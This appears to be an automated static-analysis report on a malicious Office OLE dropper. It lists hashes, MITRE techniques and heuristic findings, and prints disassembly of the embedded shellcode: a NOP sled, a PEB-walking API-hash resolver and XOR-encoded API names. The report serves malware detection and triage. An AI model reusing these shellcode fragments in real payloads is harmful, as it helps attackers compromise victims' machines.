Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e81eee32d819be17…

MALICIOUS

Office (OLE)

207.4 KB First seen: 2012-06-14
MD5: f4b7e3791eaa0223953fbf134e0ff81b SHA-1: 12d5f6148ba6b616e5638af1b6d2d008d275bac1 SHA-256: e81eee32d819be17540e317edec3d2743c18ef51e69cb152d34d4b79c0939925
300 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1203 Exploitation for Client Execution

The file is an OLE document with significant slack space and an appended executable payload, suggesting it's a dropper. Heuristics indicate the presence of NOP sleds, PEB access, API hash resolvers, and XOR-encoded strings, all common in shellcode. The appended payload and shellcode-like resolver strongly suggest the file's primary purpose is to execute a secondary stage. No specific family is identifiable from the provided evidence.

Heuristics 7

  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'KERNEL32.DLL', 'ADVAPI32.DLL', 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc', 'VirtualProtect', 'ExitProcess', 'CreateFileA'
    Disassembly
    Attempted x86 opcode disassembly
    00005098  b4ba              mov ah, 0xba
0000509A  ad                lodsd eax, dword ptr [esi]
0000509B  b1ba              mov cl, 0xba
0000509D  b3cc              mov bl, 0xcc
0000509F  cdd1              int 0xd1
000050A1  bbb3b3ffbe        mov ebx, 0xbeffb3b3
000050A6  bba9beafb6        mov ebx, 0xb6afbea9
000050AB  cc                int3
000050AC  cdd1              int 0xd1
000050AE  bbb3b3ffb2        mov ebx, 0xb2ffb3b3
000050B3  ac                lodsb al, byte ptr [esi]
000050B4  a9bcadabd1        test eax, 0xd1abadbc
000050B9  bbb3b3ffff        mov ebx, 0xffffb3b3
000050BE  ffb3909e9bb3      push dword ptr [ebx - 0x4c646170]
000050C4  96                xchg esi, eax
000050C5  9d                popfd
000050C6  8d9e8d86beff      lea ebx, [esi - 0x417973]
000050CC  ff                .byte 0xff
000050CD  ff                .byte 0xff
000050CE  b89a8baf8d        mov eax, 0x8daf8b9a
000050D3  90                nop
000050D4  9c                pushfd
000050D5  be9b9b8d9a        mov esi, 0x9a8d9b9b
000050DA  8c8cffffffa996    mov word ptr [edi + edi*8 - 0x69560001], cs
000050E1  8d8b8a9e93af      lea ecx, [ebx - 0x506c6176]
000050E7  8d908b9a9c8b      lea edx, [eax - 0x74636575]
000050ED  ff                .byte 0xff
000050EE  ff                .byte 0xff
000050EF  ffa9968d8b8a      jmp ptr [ecx - 0x7574726a]
000050F5  9e                sahf
000050F6  93                xchg ebx, eax
000050F7  be                .byte 0xbe
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00000449  90                nop
0000044A  90                nop
0000044B  90                nop
0000044C  90                nop
0000044D  90                nop
0000044E  90                nop
0000044F  90                nop
00000450  90                nop
00000451  90                nop
00000452  90                nop
00000453  90                nop
00000454  90                nop
00000455  90                nop
00000456  90                nop
00000457  90                nop
00000458  90                nop
00000459  90                nop
0000045A  90                nop
0000045B  90                nop
0000045C  90                nop
0000045D  90                nop
0000045E  90                nop
0000045F  90                nop
00000460  90                nop
00000461  90                nop
00000462  90                nop
00000463  90                nop
00000464  90                nop
00000465  90                nop
00000466  90                nop
00000467  90                nop
00000468  90                nop
00000469  90                nop
0000046A  90                nop
0000046B  90                nop
0000046C  90                nop
0000046D  90                nop
0000046E  90                nop
0000046F  90                nop
00000470  90                nop
00000471  90                nop
00000472  90                nop
00000473  90                nop
00000474  90                nop
00000475  90                nop
00000476  90                nop
00000477  90                nop
00000478  90                nop
00000479  40                inc eax
0000047A  90                nop
0000047B  4e                dec esi
0000047C  56                push esi
0000047D  ff550c            call dword ptr [ebp + 0xc]
00000480  55                push ebp
00000481  8bec              mov ebp, esp
00000483  51                push ecx
00000484  53                push ebx
00000485  8b7d08            mov edi, dword ptr [ebp + 8]
00000488  eb09              jmp 0x493
0000048A  ff                .byte 0xff
0000048B  ff                .byte 0xff
0000048C  ff                .byte 0xff
0000048D  ff                .byte 0xff
0000048E  ff                .byte 0xff
0000048F  ff                .byte 0xff
00000490  ff9090908b5d      call dword ptr [eax + 0x5d8b9090]
00000496  0c56              or al, 0x56
00000498  8b733c            mov esi, dword ptr [ebx + 0x3c]
0000049B  8b741e78          mov esi, dword ptr [esi + ebx + 0x78]
0000049F  03f3              add esi, ebx
000004A1  56                push esi
000004A2  8b7620            mov esi, dword ptr [esi + 0x20]
000004A5  03f3              add esi, ebx
000004A7  33c9              xor ecx, ecx
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    000003B3  64a130000000      mov eax, dword ptr fs:[0x30]
000003B9  8b400c            mov eax, dword ptr [eax + 0xc]
000003BC  8b701c            mov esi, dword ptr [eax + 0x1c]
000003BF  ad                lodsd eax, dword ptr [esi]
000003C0  8b7008            mov esi, dword ptr [eax + 8]
000003C3  81ec00070000      sub esp, 0x700
000003C9  8bec              mov ebp, esp
000003CB  e912010000        jmp 0x4e2
000003D0  5b                pop ebx
000003D1  33c9              xor ecx, ecx
000003D3  b10c              mov cl, 0xc
000003D5  56                push esi
000003D6  ff33              push dword ptr [ebx]
000003D8  e8a3000000        call 0x480
000003DD  89448d00          mov dword ptr [ebp + ecx*4], eax
000003E1  83c304            add ebx, 4
000003E4  e2ef              loop 0x3d5
000003E6  33f6              xor esi, esi
000003E8  bfe82d0000        mov edi, 0x2de8
000003ED  c74554c20f0300    mov dword ptr [ebp + 0x54], 0x30fc2
000003F4  037d54            add edi, dword ptr [ebp + 0x54]
000003F7  897558            mov dword ptr [ebp + 0x58], esi
000003FA  83455804          add dword ptr [ebp + 0x58], 4
000003FE  56                push esi
000003FF  ff7558            push dword ptr [ebp + 0x58]
00000402  ff552c            call dword ptr [ebp + 0x2c]
00000405  3bc7              cmp eax, edi
00000407  740b              je 0x414
00000409  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000410  7432              je 0x444
00000412  eb                .byte 0xeb
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    Attempted x86 opcode disassembly
    000003B3  64a130000000      mov eax, dword ptr fs:[0x30]
000003B9  8b400c            mov eax, dword ptr [eax + 0xc]
000003BC  8b701c            mov esi, dword ptr [eax + 0x1c]
000003BF  ad                lodsd eax, dword ptr [esi]
000003C0  8b7008            mov esi, dword ptr [eax + 8]
000003C3  81ec00070000      sub esp, 0x700
000003C9  8bec              mov ebp, esp
000003CB  e912010000        jmp 0x4e2
000003D0  5b                pop ebx
000003D1  33c9              xor ecx, ecx
000003D3  b10c              mov cl, 0xc
000003D5  56                push esi
000003D6  ff33              push dword ptr [ebx]
000003D8  e8a3000000        call 0x480
000003DD  89448d00          mov dword ptr [ebp + ecx*4], eax
000003E1  83c304            add ebx, 4
000003E4  e2ef              loop 0x3d5
000003E6  33f6              xor esi, esi
000003E8  bfe82d0000        mov edi, 0x2de8
000003ED  c74554c20f0300    mov dword ptr [ebp + 0x54], 0x30fc2
000003F4  037d54            add edi, dword ptr [ebp + 0x54]
000003F7  897558            mov dword ptr [ebp + 0x58], esi
000003FA  83455804          add dword ptr [ebp + 0x58], 4
000003FE  56                push esi
000003FF  ff7558            push dword ptr [ebp + 0x58]
00000402  ff552c            call dword ptr [ebp + 0x2c]
00000405  3bc7              cmp eax, edi
00000407  740b              je 0x414
00000409  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000410  7432              je 0x444
00000412  eb                .byte 0xeb
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 212,394 bytes but its declared streams total only 8,298 bytes — 204,096 bytes (96%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.

Open this report in the interactive analyzer, or submit your own file for analysis.